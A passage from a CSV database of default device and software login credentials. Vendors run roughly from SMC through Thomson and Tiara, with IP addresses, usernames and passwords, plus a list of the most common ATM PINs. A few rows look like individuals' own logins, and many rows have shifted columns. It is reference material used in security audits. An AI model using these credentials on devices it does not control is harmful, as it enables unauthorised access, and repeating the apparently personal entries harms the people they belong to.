Router,,,,smcadmin,,,\nsmc,SMC2804WBR,,HTTP,admin,smcadmin,Admin,,\nsmc,SMC2804WBR,v.1,HTTP,,smcadmin,Admin,,\nsmc,SMC2804WBRP-G,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC2804WBRP-G,BARRICADE g,192.168.2.1,,,house hold names,,\nsmc,SMC2804WR,,,,smcadmin,,,\nsmc,SMC2870W,,192.168.2.25,admin,smcadmin,,,\nsmc,SMC2890W-AN,,192.168.1.10,admin,,,,\nsmc,SMC7004AWBR,,,admin,,,,\nsmc,SMC7004VBR,,http://192.168.2.1,,,Administration,,\nsmc,SMC7204BRA,,,smc,smcadmin,,,\nsmc,SMC7204BRB,,,admin,smcadmin,,,\nsmc,SMC7401BRA,,,admin,barricade,,,\nsmc,SMC7901BRA,,http://192.168.2.1,,smcadmin,Admin,,\nsmc,SMC7901BRA2,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMC7901BRA2,,http://192.168.2.1,admin,smcadmin,Admin,,\nsmc,SMC7901BRA5,1,http://192.168.2.1,admin,,,,\nsmc,SMC7904BRA,,Multi,,smcadmin,Admin,,\nsmc,SMC7904BRA,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC7904WBRA,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC7904WBRA-N,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMC7904WBRA2,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMC7904WBRAS-N2,,192.168.2.1,admin,smcadmin,,,\nsmc,SMC7908VoWBRA,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC8014,1B,http://192.168.0.1,cusadmin,password,user,Brighthouse CFL,\nsmc,SMC8014W-G,2A,http://192.168.0.1,cusadmin,password,Admin,This is a Cable Modem / Wireless Router.,\nsmc,SMC8014WG,,192.168.0.1,cusadmin,password,,,\nsmc,SMC8014WN,unkown,http://192.168.0.1,cusadmin,password,unkown,Suddenlink supplied modem Multi SSID with WPA configurations available,\nsmc,SMCBR14UP,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCBR14VPN,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCBR18VPN,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCBR24Q,,http://192.168.2.1,smcadmin,smcadmin,Administration,,\nsmc,SMCD3G-CCR,,http://10.1.10.1,cusadmin,highspeed,admin,Comcast small business modem,\nsmc,SMCD3GN,,192.168.0.1,,,,,\nsmc,SMCD3GNV,,192.168.1.10,cusadmin,highspeed,,,\nsmc,SMCWBR-14N,,http://192.168.2.1,admin,smcadmin,,,\nsmc,SMCWBR11-G,,192.168.2.1,root,smcadmin,,,\nsmc,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) on your webpage is wrong,\nsmc,SMCWBR14-G,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCWBR14-GM,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCWBR14-N2,,http:192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMCWBR14S-N2,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMCWBR14T-G,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCWEBS-N,,192.168.2.10,admin,smcadmin,,,\nsmc,SMCWEBT-G,,http://192.168.2.25,,smcadmin,Administration,,\nsmc,SMCWGBR14-N,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,WiFi Router,All,HTTP,,smcadmin,Admin,model #2804WBRP-G,\nsmc,Wireless Router 2655W,,Initial Password,None Needed,MiniAP,,,\nsmc,Wireless Router 2655W,1.4h.9,HTTP,None Needed,MiniAP,Initial Password,,\nsmc,all models,all versions,cable,,highspeed,user,,\nsmc,dc-227v2 001,e.g.1.0,rev.a,http://192.168.0.1,admin,admin,benvenuto,\nsmc,smcwbr14-3gn,,192.168.2.1.,admin,smcadmin,,,\nsmc,wbr14-3gn,,192.168.2.1.,admin,123465,,,\nsmc,wifi,1,,administrator,smcadmin,admin,a,\nsmith & bentzen,InstantWebMail (IWM),,,username,password,,,\nsmithbentzen,Instant Web Mail (IWM),,http,username,password,,,\nsnap,Snap Appliance,,,admin,admin,,,\nsnapgear,Firewall,,Multi,root,admin,tcp-ip,,\nsnapgear,Lite+,,,,default,Admin,,\nsnapgear,Pro Lite and SOHO,1.79 +,Multi,root,default,Admin,Before 1.79 no user name req.,\nsnapgear,Pro, Lite, and SOHO,1.79 +,Multi,root,default,Admin,Before 1.79 no user name req.,\nsnapgear,SG300,,192.168.0.1,root,default,Admin,,\nsnapgear,SG550,,192.168.0.1,root,password,Admin,,\nsnapgear,SG560,,192.168.0.1,root,default,Admin,,\nsnapgear,SG565,,192.168.0.1,root,default,Admin,,\nsnapgear,SG570,,192.168.0.1,root,default,Admin,,\nsnapgear,SnapGear,,,root,default,,,\nsnapgear,SnapGear,,Multi,root,default,,,\nsnapgear,firewall,,Multi,root,admin,tcp-ip,,\nsnapgear,firewall,,tcp-ip,root,admin,,,\nsnom,320,,http,Administrator,0,,,\nsnom,320,,http,Administrator,0000,,,\nsnom,360,,http,Administrator,0,,,\nsnom,360,,http,Administrator,0000,,,\nsoftwareag,webMethods,,,Administrator,manage,,,\nsoftwarehouse,CCURE Access Control System,(all),Console,manager,manager,Admin,,\nsoftwarehouse,CCURE Access Control System,,Admin,manager,manager,,,\nsoho,nbg800,,,admin,1234,,,\nsoho,nbg800,,,admin,1234,,unknown,\nsolarwinds,Serv-U,,,LocalAdministrator,#l@$ak#.lk;0@P,,,\nsolarwinds,Web Help Desk,,,whd,whd,,,\nsolution6,Viztopia Accounts,,Multi,aaa,often blank,Admin,,\nsonicwall,ALL,,ALL,admin,password,,,\nsonicwall,ALL,,Admin,admin,password,,,\nsonicwall,Any Firewall Device,,,admin,password,,,\nsonicwall,Firewall,,,admin,password,,,\nsonicwall,Firewall,,HTTP,admin,password,root,,\nsonicwall,Firewall,,root,admin,password,,,\nsonicwall,Most UTM Devices (TZ/PRO/NSA),,http://192.168.168.168:80/,admin,password,,,\nsonicwall,SOHO TELE TZ and PRO,,,admin,password,,,\nsonicwall,TZ 190,,Https://10.10.10.206,admin,,,,\nsonicwall,TZ1000,1.03,,admin,depp,,,\nsonicwall,TZ170,,192.168.168.168,admin,password,Admin,,\nsonicwall,TZ190,,https://10.10.10.206,admin,,,,\nsonicx,SonicAnime,on,Telnet,root,admin,Admin,,\nsonicx,SonicAnime,on,Telnet,root,admin,Admin,1.0101E+14,\nsony,Network Camera SNC-RZ30,,,admin,admin,,,\nsony,Network Camera SNC-RZ30,,HTTP,admin,admin,,,\nsony,SNC-RZ30 Network Camera,,,admin,admin,,,\nsonyericsson,T290i,,,,0,default to reset the phone,,\nsonyericsson,T290i,,,,0000,default to reset the phone,,\nsonyericsson,T68i,,,,0,default to reset the phone,,\nsonyericsson,T68i,,,,0000,default to reset the phone,,\nsonyericsson,md300,all versios,console,,,user,,\nsonyericsson,sony ericsson xperia,x1,,apex,ccg425,,,\nsophiaschweizag,Protector,,HTTPS,admin,Protector,Admin,,\nsophiaschweizag,Protector,,SSH,root,root,Admin,,\nsorenson,SR-200,,HTTP,,admin,Admin,,\nsourcebycircuitcity,In-Store Demo Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nsourcebycircuitcity,In-Store Demo Windows Screen Savers,,,,lt;Store Numbergt;,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nsourcefire,RNA Sensor,,,admin,password,,,\nsourcefire,RNA Sensor,,,root,password,,,\nsourcefire,RNA Sensor,,http,admin,password,Admin,,\nsourcefire,RNA Sensor,,ssh/console,root,password,Admin,,\nsovereign hill,InQuery,,,Admin,shs,,,\nsovereignhill,InQuery,,,Admin,shs,Admin,,\nsoyo,PC BIOS,,console,,SY_MB,Admin,,\nspeco,CCTV Digital Video Recorder,all,web interface,admin,1234,admin operator,,\nspeco,CCTV Digital Video Recorder,all,web interface,user,4321,viewing user,,\nspeedstream,5660,,Telnet,,adminttd,Admin,,\nspeedstream,5667,R4.0.1 ,HTTP,,admin,Admin,,\nspeedstream,5667,R4.0.1,HTTP,,admin,Admin,,\nspeedstream,5861 SMT Router,,,admin,admin,,,\nspeedstream,5861 SMT Router,,Admin,admin,admin,,,\nspeedstream,5861 SMT Router,,Multi,admin,admin,Admin,,\nspeedstream,5871 IDSL Router,,,admin,admin,,,\nspeedstream,5871 IDSL Router,,Admin,admin,admin,,,\nspeedstream,5871 IDSL Router,,Multi,admin,admin,Admin,,\nspeedstream,DSL,,,admin,admin,,,\nspeedstream,DSL,,Admin,admin,admin,,,\nspeedstream,DSL,,Multi,admin,admin,Admin,,\nspeedstream,Router 250 ssr250,,,admin,admin,,,\nspeedstream,Router 250 ssr250,,Admin,admin,admin,,,\nspeedstream,Router 250 ssr250,,Multi,admin,admin,Admin,,\nspeedxess,HASE-120,,,,speedxess,,,\nspeedxess,HASE-120,,Admin,,speedxess,,,\nspeedxess,HASE-120,,Multi,,speedxess,Admin,,\nsphairon,AR860,,HTTP,admin,xad$l#12,,,\nspider systems,M250,,,,hello,,,\nspidersystems,M250,,,,hello,,,\nspike,CPE,,,enable,,,,\nspike,CPE,,Admin,enable,,,,\nspike,CPE,,Console,enable,,Admin,,\nsplunk,Splunk,,,admin,changeme,,,\nsprint,PCS,,Other,self,system,remote voicemail,,\nsprint,pcs,,remote voicemail,self,system,,,\nssangyoung,SR2501,,,,2501,,,\nstanozier,TaskFreak,,,admin,,,,\nstratitec,TimeIPS,,root,root,ahetzip8,,,\nstratitec,TimeIPS,All,Console,root,ahetzip8,root,,\nsun,,,,root,,,SunOS 4.1.4,\nsun,Cobalt,,HTTP,admin,admin,Admin,,\nsun,E10000 System Service Processor,,multi,ssp,ssp,Admin,,\nsun,JavaServer,,,admin,admin,,,\nsun,JavaWebServer,,1.x 2.x,admin,admin,,,\nsun,JavaWebServer,,Admin,admin,admin,,,\nsun,JavaWebServer,1.x 2.x,AdminSrv,admin,admin,Admin,,\nsun,Sun E10000 System Service Processor,,,ssp,ssp,,,\nsun,SunOS,,,root,t00lk1t,,,\nsun,SunOS,,,root,t00lk1t,Admin,,\nsun,SunOS,,,root,t00lk1t,Admin,default root password set by the Solaris Security Toolkit (JASS) v0.3 toolkit upon execution of the default hardening scripts.,\nsun,SunScreen,,3.1 Lite,admin,admin,,,\nsun,SunScreen,3.1 Lite,http (with java) port 3852,admin,admin,Admin,,\nsun,many,,,root,sun123,,,\nsun,many,,Other,root,sun123,,,\nsunmicrosystems,ILOM of X4100,1,HTTP,root,changeme,Admin,,\nsupermicro,PC BIOS,,,,ksdjfg934t,,,\nsupermicro,PC BIOS,,Admin,,ksdjfg934t,,,\nsupermicro,PC BIOS,,Console,,ksdjfg934t,Admin,,\nsupermicrocomputer,IPMI,,,ADMIN,ADMIN,,,\nsurecom,EP3501/3506,,,admin,surecom,,own os,\nsurecom,Unknown,,,admin,surecom,,,\nsurecom,Wireless Broadband Router 11Mbps,,,admin,admin,Administrator,,\nsuse gmbh,Emailserver,,1.x,root,root,,,\nsuse gmbh,Emailserver,,Admin,root,root,,,\nsusegmbh,Emailserver,1.x,Telnet,root,root,Admin,,\nsweex,,,,sweex,mysweex,,,\nsweex,Broadband Router,,Admin,,blank,,,\nsweex,Broadband Router,LB000020,HTTP,,blank,Admin,,\nsweex,LW055,,192.168.55.1,sweex,mysweex,admin,,\nsweex,LWO50v2,nr 924330268,192.168.50.1,,,admin,,\nsweex,MO200,,http://192.168.200.1,sweex,mysweex,,,\nsweex,lw050v2,2,192.168.50.1,sweex,mysweex,admin,admin,pasword hack\nsweex,lw050v2,2.0,192.168.50.1,sweex,mysweex,delta,,\nswissvoice,IP 10S,,Telnet,target,password,Admin,,\nsybase (datev),Adaptive Server Enterprise,,12,sa,sasasa,,,\nsybase (datev),Adaptive Server Enterprise,,Admin,sa,sasasa,,,\nsybase,Adaptive Server Enterprise,,,12.x,,,,\nsybase,Adaptive Server Enterprise,,11.x 12.x,sa,,,,\nsybase,Adaptive Server Enterprise,,SA and SSO roles,sa,,,,\nsybase,Adaptive Server Enterprise,11.x 12.x,Multi,sa,,SA and SSO roles,,\nsybase,EAServer,,HTTP,jagadmin,,Admin,Source : Manufactor documentation,\nsybase,Sybase,,8,DBA,SQL,,,\nsybase,Sybase,,Admin,DBA,SQL,,,\nsybase,Sybase,8,Multi,DBA,SQL,Admin,,\nsybase,Sybase,8.0,Multi,DBA,SQL,Admin,,\nsybasedatev,Adaptive Server Enterprise,12,Multi,sa,sasasa,Admin,,\nsybasedatev,Adaptive Server Enterprise,12.0,Multi,sa,sasasa,Admin,,\nsymantec,BrightMail,,Gateway,admin,symantec,admin,,\nsymantec,Brightmail Anti-Spam,,,root,brightmail,,,\nsymantec,Brightmail Anti-Spam,,,root,brightmail,,the MySQL account's password,\nsymantec,NAV CORP / ALL,,,admin,symantec,,,\nsymantec,NAV CORP / ALL,,Admin,admin,symantec,,,\nsymantec,NAV CORP / ALL,,HTTP,admin,symantec,Admin,,\nsymantec,Norton Antivirus Corp Ed.,,Admin,,symantec,,,\nsymantec,Norton Antivirus Corp Ed.,,all,,symantec,,,\nsymantec,Norton Antivirus Corp Ed.,all,Multi,,symantec,Admin,,\nsymantec,Norton Antivurs,,,,symantec,,,\nsymantec,VPN-Firewall,,,admin,,,,\nsymantec,VPN/Firewall Appliance,100/200,http,admin,,Admin,,\nsymbol,AP-2412,,Multi,,Symbol,Admin,2Mbps FH AccessPoint,\nsymbol,AP-3020,,Multi,,Symbol,Admin,2Mbps FH AccessPoint,\nsymbol,AP-4111,,Multi,,Symbol,Admin,11Mbps DS AccessPoint,\nsymbol,AP-4121,,Multi,,Symbol,Admin,11Mbps DS AccessPoint,\nsymbol,AP-4131,,Multi,,Symbol,Admin,11Mbps DS AccessPoint,\nsymbol,AP-5131,,Multi,admin,motorola,https,,\nsymbol,Spectrum 24 Access Point,,,Symbol,Symbol,,,\nsymbol,Spectrum 24 Access Point,,HTTP,Symbol,Symbol,,,\nsymbol,Spectrum 24 Access Point,,http,symbol,Symbol,Admin,,\nsymbol,Spectrum,series 4100-4121,HTTP,,Symbol,Admin,Access Point Wireless,\nsymbol,ap5131,,,admin,symbol,,,\nsynology,CS-406,All,Web Management UI,admin,,Admin,,\nsynology,CS-406e,All,Web Management UI,admin,,Admin,,\nsynology,CS407,All,Web Management UI,admin,,Admin,,\nsynology,CS407e,All,Web Management UI,admin,,Admin,,\nsynology,DS-101,All,Web Management UI,admin,,Admin,,\nsynology,DS-101g+,All,Web Management UI,admin,,Admin,,\nsynology,DS-101j,All,Web Management UI,admin,,Admin,,\nsynology,DS-106,All,Web Management UI,admin,,Admin,,\nsynology,DS-106e,All,Web Management UI,admin,,Admin,,\nsynology,DS-106j,All,Web Management UI,admin,,Admin,,\nsynology,DS1010+,All,Web Management UI,admin,,Admin,,\nsynology,DS107+,All,Web Management UI,admin,,Admin,,\nsynology,DS107,All,Web Management UI,admin,,Admin,,\nsynology,DS107e,All,Web Management UI,admin,,Admin,,\nsynology,DS108j,All,Web Management UI,admin,,Admin,,\nsynology,DS109+,All,Web Management UI,admin,,Admin,,\nsynology,DS109,All,Web Management UI,admin,,Admin,,\nsynology,DS109j,All,Web Management UI,admin,,Admin,,\nsynology,DS110+,All,Web Management UI,admin,,Admin,,\nsynology,DS110j,All,Web Management UI,admin,,Admin,,\nsynology,DS111,All,Web Management UI,admin,,Admin,,\nsynology,DS112+,All,Web Management UI,admin,,Admin,,\nsynology,DS112,All,Web Management UI,admin,,Admin,,\nsynology,DS112j,All,Web Management UI,admin,,Admin,,\nsynology,DS1511+,All,Web Management UI,admin,,Admin,,\nsynology,DS1512+,All,Web Management UI,admin,,Admin,,\nsynology,DS1812+,All,Web Management UI,admin,,Admin,,\nsynology,DS207+,All,Web Management UI,admin,,Admin,,\nsynology,DS207,All,Web Management UI,admin,,Admin,,\nsynology,DS209+,All,Web Management UI,admin,,Admin,,\nsynology,DS209+II,All,Web Management UI,admin,,Admin,,\nsynology,DS209,All,Web Management UI,admin,,Admin,,\nsynology,DS209j,All,Web Management UI,admin,,Admin,,\nsynology,DS210+,All,Web Management UI,admin,,Admin,,\nsynology,DS210j,All,Web Management UI,admin,,Admin,,\nsynology,DS211+,All,Web Management UI,admin,,Admin,,\nsynology,DS211,All,Web Management UI,admin,,Admin,,\nsynology,DS211j,All,Web Management UI,admin,,Admin,,\nsynology,DS212+,All,Web Management UI,admin,,Admin,,\nsynology,DS212,All,Web Management UI,admin,,Admin,,\nsynology,DS212j,All,Web Management UI,admin,,Admin,,\nsynology,DS2411+,All,Web Management UI,admin,,Admin,,\nsynology,DS3611xs,All,Web Management UI,admin,,Admin,,\nsynology,DS3612xs,All,Web Management UI,admin,,Admin,,\nsynology,DS408,All,Web Management UI,admin,,Admin,,\nsynology,DS409+,All,Web Management UI,admin,,Admin,,\nsynology,DS409,All,Web Management UI,admin,,Admin,,\nsynology,DS409slim,All,Web Management UI,admin,,Admin,,\nsynology,DS410,All,Web Management UI,admin,,Admin,,\nsynology,DS410j,All,Web Management UI,admin,,Admin,,\nsynology,DS411+,All,Web Management UI,admin,,Admin,,\nsynology,DS411+II,All,Web Management UI,admin,,Admin,,\nsynology,DS411,All,Web Management UI,admin,,Admin,,\nsynology,DS411j,All,Web Management UI,admin,,Admin,,\nsynology,DS411slim,All,Web Management UI,admin,,Admin,,\nsynology,DS412+,All,Web Management UI,admin,,Admin,,\nsynology,DS508,All,Web Management UI,admin,,Admin,,\nsynology,DS509+,All,Web Management UI,admin,,Admin,,\nsynology,DS710+,All,Web Management UI,admin,,Admin,,\nsynology,DS712+,All,Web Management UI,admin,,Admin,,\nsynology,RS-406,All,Web Management UI,admin,,Admin,,\nsynology,RS212,All,Web Management UI,admin,,Admin,,\nsynology,RS2211+,All,Web Management UI,admin,,Admin,,\nsynology,RS2211RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS2212+,All,Web Management UI,admin,,Admin,,\nsynology,RS2212RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS3411xs,All,Web Management UI,admin,,Admin,,\nsynology,RS3412RPxs,All,Web Management UI,admin,,Admin,,\nsynology,RS3412xs,All,Web Management UI,admin,,Admin,,\nsynology,RS407,All,Web Management UI,admin,,Admin,,\nsynology,RS408,All,Web Management UI,admin,,Admin,,\nsynology,RS408-RP,All,Web Management UI,admin,,Admin,,\nsynology,RS409+,All,Web Management UI,admin,,Admin,,\nsynology,RS409,All,Web Management UI,admin,,Admin,,\nsynology,RS409RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS411,All,Web Management UI,admin,,Admin,,\nsynology,RS810+,All,Web Management UI,admin,,Admin,,\nsynology,RS810RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS812+,All,Web Management UI,admin,,Admin,,\nsynology,RS812,All,Web Management UI,admin,,Admin,,\nsynology,RS812RP+,All,Web Management UI,admin,,Admin,,\nsynology,USB Station,All,Web Management UI,admin,,Admin,,\nsynologyinc,DSM Server,,,admin,,,,\nsyskonnect,6616,,,default.password,,,,\nsystem32,VOS,,Multi,install,secret,Admin,,\ntandberg,Border Controller,,Telnet/ssh/http,admin,TANDBERG,Admin,,\ntandberg,Codec,,,admin,,,,\ntandberg,DLT8000 Autoloader 10x,,Console,,10023,Maintenance,,\ntandberg,Gatekeeper,,,admin,TANDBERG,Admin,,\ntandberg,TANDBERG,,8000,,TANDBERG,,,\ntandberg,Tandberg,8000,Multi,,TANDBERG,Admin,http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf,\ntandberg,Video Communication Server,,,root,TANDBERG,,,\ntandem,TACL,,Multi,super.super,,Admin,,\ntandem,TACL,,Multi,super.super,master,Admin,,\ntasman,T1,1000 Series,console,Tasman,Tasmannet,Admin,,\ntasman,T1,4000 Series,console,Tasman,Tasmannet,Admin,,\ntasman,T1,6000 Series,console,Tasman,Tasmannet,Admin,,\ntasman,T1,7000 Series,console,Tasman,Tasmannet,Admin,,\ntcomfort,Routers,,HTTP,Administrator,,Admin,,\nteamxodus,XeniumOS,2.3,FTP,xbox,xbox,Admin,,\ntecom,Titan,,admin,TECOM MASTER,4346,,,\ntecom,Titan,2.06,Other,TECOM MASTER,4346,admin,,\ntegile,Zebi Array,,,admin,tegile,,,\ntekelec,Eagle STP,,,eagle,eagle,,,\nteklogix,Accesspoint,,Multi,Administrator,,Admin,,\ntelappliant,IP2006 SIP Phone,,http,admin,1234,Admin,,\ntelcel,Telcel,all versions,numers,root,1111,root,,\ntelcosystems,Edge Link 100,,Console,telco,telco,telco,,\ntelebit,Netblazer,,,setup,setup,,,\ntelebit,Netblazer,,,snmp,nopasswd,,,\ntelebit,netblazer 3.*,,,setup,setup,,,\ntelebit,netblazer 3.*,,,snmp,nopasswd,,,\ntelecomnz,Nokia M10,,,Telecom,Telecom,,,\nteledat,Routers,,HTTP,admin,1234,Admin,,\ntelelec,Eagle,,,eagle,eagle,,,\nteletronics,WL-CPE-Router,3.05.2,HTTPS,admin,1234,Admin,,\ntelewall,TW-EA510,,,admin,admin,,,\ntelewell,TW-EA200,,Multi,admin,password,Admin,,\ntelewell,TW-EA510,,http://192.168.0.254,admin,admin,Admin,,\ntelindus,1124,,HTTP,,,Admin,,\ntelindus,SHDSL1421,yes,HTTP,admin,admin,Admin,,\ntelindus,telindus,2002,Telnet,admin,admin,Admin,,\ntellabs,7120,,Multi,root,admin_1,Admin,telnet on port 3083,\ntellabs,Titan 5500,,Admin,tellabs,tellabs#1,,,\ntellabs,Titan 5500,,FP 6.x,tellabs,tellabs#1,,,\ntellabs,Titan 5500,FP 6.x,Multi,tellabs,tellabs#1,Admin,,\nteltronic s.a.u.,NEBULA,,,admin,tetra,,,\ntelus,Telephony Services,,,(created),telus00,,,\ntelus,Telephony and internet services,,,(username),telus00,User,Initial password if issued in 2000,\ntelus,Telephony and internet services,,,(username),telus01,User,Initial password if issued in 2001,\ntelus,Telephony and internet services,,,(username),telus02,User,Initial password if issued in 2002,\ntelus,Telephony and internet services,,,(username),telus03,User,Initial password if issued in 2003,\ntelus,Telephony and internet services,,,(username),telus04,User,Initial password if issued in 2004,\ntelus,Telephony and internet services,,,(username),telus05,User,Initial password if issued in 2005,\ntelus,Telephony and internet services,,,(username),telus06,User,Initial password if issued in 2006,\ntelus,Telephony and internet services,,,(username),telus07,User,Initial password if issued in 2007,\ntelus,Telephony and internet services,,,(username),telus08,User,Initial password if issued in 2008,\ntelus,Telephony and internet services,,,(username),telus09,User,Initial password if issued in 2009,\ntelus,Telephony and internet services,,,(username),telus10,User,Initial password if issued in 2010,\ntelus,Telephony and internet services,,,(username),telus11,User,Initial password if issued in 2011,\ntelus,Telephony and internet services,,,(username),telus12,User,Initial password if issued in 2012,\ntelus,Telephony and internet services,,,(username),telus13,User,Initial password if issued in 2013,\ntelus,Telephony and internet services,,,(username),telus99,User,Initial password if issued in 1999,\ntenda,W150M,,192.168.1.1,admin,admin,Admin,,\nterayon,,,,admin,nms,,6.29,\nterayon,,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html,\nterayon,TeraLink 1000 Controller,,,admin,password,,,\nterayon,TeraLink 1000 Controller,,,user,password,,,\nterayon,TeraLink Getaway,,,admin,password,,,\nterayon,TeraLink Getaway,,,user,password,,,\nterayon,TeraLink,,,admin,password,,,\nterayon,Unknown,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html,\ntexbox,TexBox,,,no user,123,,,\ntextportal,TextPortal,,,god1,12345,,,\ntextportal,TextPortal,,,god2,12345,,,\nthecus,Tech N5200,,,admin,admin,,,\nthomson,,,,D8AA0,12345678,,,\nthomson,585,7,192.168.254,,,admin,,\nthomson,782i,,http://192.168.1.254,Administrator,CPE.hgw.12,Administrator,Made in Macedonia! BaDxBoY,\nthomson,95124f,WBR-2310,,,,,root,\nthomson,DCW725 Wireless Cable Gateway,,,,admin,Admin,,\nthomson,DWG855,,,blank,admin,Admin,,\nthomson,ST2030,All,10.1.24.88,administrator,784518,Admin,,\nthomson,SpeedTouch ,,125.24.231.95,admin,suadmin,,,\nthomson,SpeedTouch 516,Most,192.168.1.254 or http://speedtouch.lan,Administrator,,Admin,,\nthomson,SpeedTouch 530,,http://10.0.0.138,,,Administration,,\nthomson,SpeedTouch 530,All,10.0.0.138,,,Admin,,\nthomson,SpeedTouch 536,,http://192.168.1.254,Administrator,,Administration,,\nthomson,SpeedTouch 536,Bigpond firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Bigpond-issued devices,\nthomson,SpeedTouch 536,Most,192.168.1.254,Administrator,,Admin,,\nthomson,SpeedTouch 536,v6 Telstra firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Telstra-issued devices,\nthomson,SpeedTouch 536,v6,192.168.1.254,Administrator,,Admin,,\nthomson,SpeedTouch 546,,http://192.168.1.254 or http://speedtouch.lan,Administrator,,Administration,,\nthomson,SpeedTouch 570,All,10.0.0.138,,,Admin,,\nthomson,SpeedTouch 576,1.7,http://192.168.1.67,blank,blank,admin,,\nthomson,SpeedTouch 580,,http://192.168.1.254,Administrator,,Administration,,\nthomson,SpeedTouch 580,Most,192.168.1.254,Administrator,,2012-01-08,,\nthomson,SpeedTouch 585,,http://192.168.1.254,Administrator,,Administration,,\nthomson,SpeedTouch 780 WL,SSID.SpeedTouchB,192.168.1.254,,,,,\nthomson,SpeedTouch AP 180,,,,admin,Admin,,\nthomson,SpeedTouch Home,,http://10.0.0.138,admin,admin,Administration,,\nthomson,SpeedTouch Home,All,10.0.0.138,(no default),(no default),Admin,,\nthomson,SpeedTouch Pro,,http://10.0.0.138,admin,admin,Administration,,\nthomson,SpeedTouch Pro,4-Port FW,10.0.0.138,,,Admin,,\nthomson,SpeedTouch Pro,4-Port,10.0.0.138,,,Admin,,\nthomson,SpeedTouch Pro,All,10.0.0.138,admin,admin,Admin,,\nthomson,SpeedTouch,,125.24.231.95,admin,suadmin,,,\nthomson,SpeedTouch261A3E,SpeedTouch585v6,,administrator,administrator,,,\nthomson,SpeedTouch580,,,admin,admin,,,\nthomson,SpeedTouch580,4.3.19,HTTP,admin,admin,,,\nthomson,Speedtouch 585,V6,,Admin,23698,,,\nthomson,TCW-710,,,,admin,Admin,,\nthomson,TG585,7,192.168.1.254,jalvarez,pc2119,Poniente 29,,\nthomson,TG585,v7,192.168.1.254,Administrator,,Admin,,\nthomson,TG782,,http://192.168.1.254/,,,admin,,\nthomson,TG782T,All,10.0.0.138 or 192.168.1.254 or bigpond.bigpond,admin,,Admin,Modem locked to Bigpond or Telstra,\nthomson,Technicolor TG587n,v3,admin,admin,Admin,2012-01-08,,\nthomson,speed touch,780i wl,,szilizs,keszeg,,,\nthomson,speedtouch 585V6,,,Admin,23698,,,\nthomson,win 7,st780wl,192.168.1.254,,,,,\nthomson,xp,all versions,http://192.168.1.254/,administrator,,administrator,,\ntiara networks,(router???),,1400 6100 6200,,tiara,,,\ntiara networks,(router???),,tiaranet,,tiara,,,\ntiara,1400,3.x,Console,tiara,tiaranet,Admin,also known as Tasman Networks routers,\ntiara,Tiara,,,tiara,tiaranet,,,\ntiaranetworks,(router???),1400 6100 6200,Multi,,tiara,tiaranet,,\ntibco,MFT Internet Server,,,admin,admin,,,\ntibco,Slingshot,,,admin,changeit,,,\ntim schaab,Mad.Thought,,2.0.1,theman,changeit,,,\ntimetools,SR Series NTP Server,,,admin,admin,,,\ntimschaab,Mad.Thought,2.0.1,http,theman,changeit,Admin,,\ntiny,PC BIOS,,,,Tiny,,,\ntiny,PC BIOS,,Console,,Tiny,Admin,,\ntinys,PC BIOS,,,,Tiny,,,\ntinys,PC BIOS,,,,tiny,,,\ntinys,PC BIOS,,Admin,,Tiny,,,\ntmc,PC BIOS,,,,BIGO,,,\ntmc,PC BIOS,,Admin,,BIGO,,,\ntmc,PC BIOS,,Console,,BIGO,Admin,,\ntop20mostusedatmpins,# 1,,ATM,,1234,,Used by 10.7 percent of all cardholders,\ntop20mostusedatmpins,# 2,,ATM,,1111,,Used by 6.02 percent of all cardholders,\ntop20mostusedatmpins,# 3,,ATM,,0000,,Used by 1.88 percent of all cardholders,\ntop20mostusedatmpins,# 4,,ATM,,1212,,Used by 1.2 percent of all cardholders,\ntop20mostusedatmpins,# 5,,ATM,,7777,,Used by 0.75 percent of all cardholders,\ntop20mostusedatmpins,# 6,,ATM,,1004,,Used by 0.62 percent of all cardholders,\ntop20mostusedatmpins,# 7,,ATM,,2000,,Used by 0.61 percent of all cardholders,\ntop20mostusedatmpins,# 8,,ATM,,4444,,Used by 0.53 percent of all cardholders,\ntop20mostusedatmpins,# 9,,ATM,,2222,,Used by 0.52 percent of all cardholders,\ntop20mostusedatmpins,#10,,ATM,,6969,,Used by 0.51 percent of all cardholders,\ntop20mostusedatmpins,#11,,ATM,,9999,,Used by 0.45 percent of all cardholders,\ntop20mostusedatmpins,#12,,ATM,,3333,,Used by 0.42 percent of all cardholders,\ntop20mostusedatmpins,#13,,ATM,,5555,,Used by 0.4 percent of all cardholders,\ntop20mostusedatmpins,#14,,ATM,,6666,,Used by 0.39 percent of all cardholders,\ntop20mostusedatmpins,#15,,ATM,,1122,,Used by 0.37 percent of all cardholders,\ntop20mostusedatmpins,#16,,ATM,,1313,,Used by 0.3 percent of all cardholders,\ntop20mostusedatmpins,#17,,ATM,,8888,,Used by 0.3 percent of all cardholders,\ntop20mostusedatmpins,#18,,ATM,,4321,,Used by 0.29 percent of all cardholders,\ntop20mostusedatmpins,#19,,ATM,,2001,,Used by 0.29 percent of all 